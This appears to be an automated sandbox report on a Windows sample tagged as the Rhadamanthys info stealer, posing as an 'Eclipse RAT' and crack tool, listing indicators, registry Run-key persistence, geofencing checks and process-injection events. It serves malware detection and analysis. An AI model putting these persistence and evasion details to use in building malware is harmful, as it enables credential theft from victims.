Analysis
-
max time kernel
117s -
max time network
114s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
04-04-2024 16:01
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://file.io/V90fz4A5z12x
Resource
win10v2004-20240226-en
General
-
Target
https://file.io/V90fz4A5z12x
Malware Config
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
svchost.exesvchost.exesvchost.exedescription pid process target process PID 968 created 2888 968 svchost.exe sihost.exe PID 5684 created 2888 5684 svchost.exe sihost.exe PID 1008 created 2888 1008 svchost.exe sihost.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Eclipse.execrack.exeEclipse.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation Eclipse.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation crack.exe Key value queried \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\International\Geo\Nation Eclipse.exe -
Executes dropped EXE 14 IoCs
Processes:
Eclipse.exesvchost.exeexplorer.exeexplorer.exeexplorer.exeexplorer.execrack.exesvchost.exeexplorer.exeexplorer.exeEclipse.exesvchost.exeexplorer.exeexplorer.exepid process 5480 Eclipse.exe 968 svchost.exe 4568 explorer.exe 4284 explorer.exe 7936 explorer.exe 7724 explorer.exe 3844 crack.exe 5684 svchost.exe 3928 explorer.exe 3204 explorer.exe 5792 Eclipse.exe 1008 svchost.exe 1488 explorer.exe 7388 explorer.exe -
Loads dropped DLL 30 IoCs
Processes:
explorer.exeexplorer.exeexplorer.exeexplorer.exepid process 4284 explorer.exe 4284 explorer.exe 4284 explorer.exe 4284 explorer.exe 4284 explorer.exe 4284 explorer.exe 7724 explorer.exe 7724 explorer.exe 7724 explorer.exe 7724 explorer.exe 7724 explorer.exe 7724 explorer.exe 7724 explorer.exe 7724 explorer.exe 3204 explorer.exe 3204 explorer.exe 3204 explorer.exe 3204 explorer.exe 3204 explorer.exe 3204 explorer.exe 3204 explorer.exe 3204 explorer.exe 7388 explorer.exe 7388 explorer.exe 7388 explorer.exe 7388 explorer.exe 7388 explorer.exe 7388 explorer.exe 7388 explorer.exe 7388 explorer.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\_MEI45682\python310.dll upx behavioral1/memory/4284-583-0x00007FF8E1780000-0x00007FF8E1BE6000-memory.dmp upx behavioral1/memory/4284-592-0x00007FF8F49D0000-0x00007FF8F49DF000-memory.dmp upx behavioral1/memory/4284-593-0x00007FF8E23A0000-0x00007FF8E23B8000-memory.dmp upx behavioral1/memory/4284-594-0x00007FF8E1CE0000-0x00007FF8E1D0C000-memory.dmp upx behavioral1/memory/4284-596-0x00007FF8E3620000-0x00007FF8E3644000-memory.dmp upx behavioral1/memory/4284-629-0x00007FF8E1780000-0x00007FF8E1BE6000-memory.dmp upx behavioral1/memory/7724-649-0x00007FF8EC3E0000-0x00007FF8EC846000-memory.dmp upx behavioral1/memory/7724-652-0x00007FF8FD700000-0x00007FF8FD724000-memory.dmp upx behavioral1/memory/7724-653-0x00007FF8FD6F0000-0x00007FF8FD6FF000-memory.dmp upx behavioral1/memory/7724-659-0x00007FF8FD6D0000-0x00007FF8FD6E8000-memory.dmp upx behavioral1/memory/7724-663-0x00007FF8FD6A0000-0x00007FF8FD6CC000-memory.dmp upx behavioral1/memory/7724-660-0x00007FF8FD670000-0x00007FF8FD67D000-memory.dmp upx behavioral1/memory/7724-665-0x00007FF8FD680000-0x00007FF8FD699000-memory.dmp upx behavioral1/memory/7724-748-0x00007FF8EC3E0000-0x00007FF8EC846000-memory.dmp upx behavioral1/memory/7724-749-0x00007FF8FD700000-0x00007FF8FD724000-memory.dmp upx behavioral1/memory/3204-845-0x00007FF8E2E00000-0x00007FF8E3266000-memory.dmp upx behavioral1/memory/3204-847-0x00007FF8F47F0000-0x00007FF8F4814000-memory.dmp upx behavioral1/memory/3204-859-0x00007FF8F8180000-0x00007FF8F818F000-memory.dmp upx behavioral1/memory/3204-860-0x00007FF8F4620000-0x00007FF8F464C000-memory.dmp upx behavioral1/memory/3204-861-0x00007FF8F49D0000-0x00007FF8F49DD000-memory.dmp upx behavioral1/memory/3204-862-0x00007FF8F47D0000-0x00007FF8F47E8000-memory.dmp upx -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
explorer.exeexplorer.exeexplorer.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\Downloads\\Eclipse RAT\\explorer.exe" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update64 = "C:\\Users\\Admin\\Downloads\\Eclipse RAT\\explorer.exe" explorer.exe -
Detects Pyinstaller 1 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\explorer.exe pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 6932 taskkill.exe -
Processes:
explorer.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe -
Modifies registry class 34 IoCs
Processes:
explorer.exemsedge.exerundll32.exedescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Rev = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\LogicalViewMode = "1" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" explorer.exe Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259} explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" explorer.exe Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupView = "4294967295" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 explorer.exe Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Downloads" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616193" explorer.exe Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings msedge.exe Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders rundll32.exe Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0\0 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" explorer.exe Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\0\0\0 explorer.exe Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Vid = "{137E7700-3573-11CF-AE69-08002B2E1262}" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1092616209" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\IconSize = "16" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Generic" explorer.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
explorer.exepid process 3488 explorer.exe -
Suspicious behavior: EnumeratesProcesses 46 IoCs
Processes:
msedge.exemsedge.exeidentity_helper.exemsedge.exemsedge.exepowershell.exepowershell.exesvchost.exedialer.exepowershell.exepowershell.exesvchost.exedialer.exepowershell.exepowershell.exesvchost.exedialer.exepid process 3836 msedge.exe 3836 msedge.exe 1852 msedge.exe 1852 msedge.exe 7540 identity_helper.exe 7540 identity_helper.exe 5844 msedge.exe 5844 msedge.exe 1240 msedge.exe 1240 msedge.exe 5412 powershell.exe 5412 powershell.exe 5208 powershell.exe 5208 powershell.exe 5208 powershell.exe 5412 powershell.exe 968 svchost.exe 968 svchost.exe 3564 dialer.exe 3564 dialer.exe 3564 dialer.exe 3564 dialer.exe 7716 powershell.exe 7716 powershell.exe 8172 powershell.exe 8172 powershell.exe 8172 powershell.exe 7716 powershell.exe 5684 svchost.exe 5684 svchost.exe 6788 dialer.exe 6788 dialer.exe 6788 dialer.exe 6788 dialer.exe 5416 powershell.exe 5416 powershell.exe 5164 powershell.exe 5164 powershell.exe 5416 powershell.exe 5164 powershell.exe 1008 svchost.exe 1008 svchost.exe 7996 dialer.exe 7996 dialer.exe 7996 dialer.exe 7996 dialer.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
explorer.exepid process 3488 explorer.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 53 IoCs
Processes:
msedge.exepid process 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
Processes:
7zG.exepowershell.exepowershell.exetaskkill.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeRestorePrivilege 7040 7zG.exe Token: 35 7040 7zG.exe Token: SeSecurityPrivilege 7040 7zG.exe Token: SeSecurityPrivilege 7040 7zG.exe Token: SeDebugPrivilege 5412 powershell.exe Token: SeDebugPrivilege 5208 powershell.exe Token: SeDebugPrivilege 6932 taskkill.exe Token: SeDebugPrivilege 7716 powershell.exe Token: SeDebugPrivilege 8172 powershell.exe Token: SeDebugPrivilege 5164 powershell.exe Token: SeDebugPrivilege 5416 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exepid process 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe -
Suspicious use of SendNotifyMessage 26 IoCs
Processes:
msedge.exepid process 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe 1852 msedge.exe -
Suspicious use of SetWindowsHookEx 20 IoCs
Processes:
Eclipse.exesvchost.exeexplorer.exeexplorer.exeexplorer.exeexplorer.exeexplorer.execrack.exesvchost.exeexplorer.exeexplorer.exeEclipse.exesvchost.exeexplorer.exeexplorer.exepid process 5480 Eclipse.exe 968 svchost.exe 4568 explorer.exe 4284 explorer.exe 7936 explorer.exe 7724 explorer.exe 3488 explorer.exe 3488 explorer.exe 3488 explorer.exe 3488 explorer.exe 3844 crack.exe 5684 svchost.exe 3928 explorer.exe 3204 explorer.exe 5792 Eclipse.exe 1008 svchost.exe 1488 explorer.exe 7388 explorer.exe 3488 explorer.exe 3488 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 1852 wrote to memory of 3776 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3776 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3696 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3836 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 3836 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe PID 1852 wrote to memory of 1792 1852 msedge.exe msedge.exe
Processes
-
C:\Windows\system32\sihost.exesihost.exe1⤵PID:2888
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3564
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:6788
-
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:7996
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://file.io/V90fz4A5z12x1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1852 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8f42846f8,0x7ff8f4284708,0x7ff8f42847182⤵PID:3776
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:22⤵PID:3696
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2248 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:3836
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2644 /prefetch:82⤵PID:1792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:12⤵PID:3280
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3356 /prefetch:12⤵PID:4748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,7075614163831770538,1134041347545782405,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:12⤵PID:2224
-
-
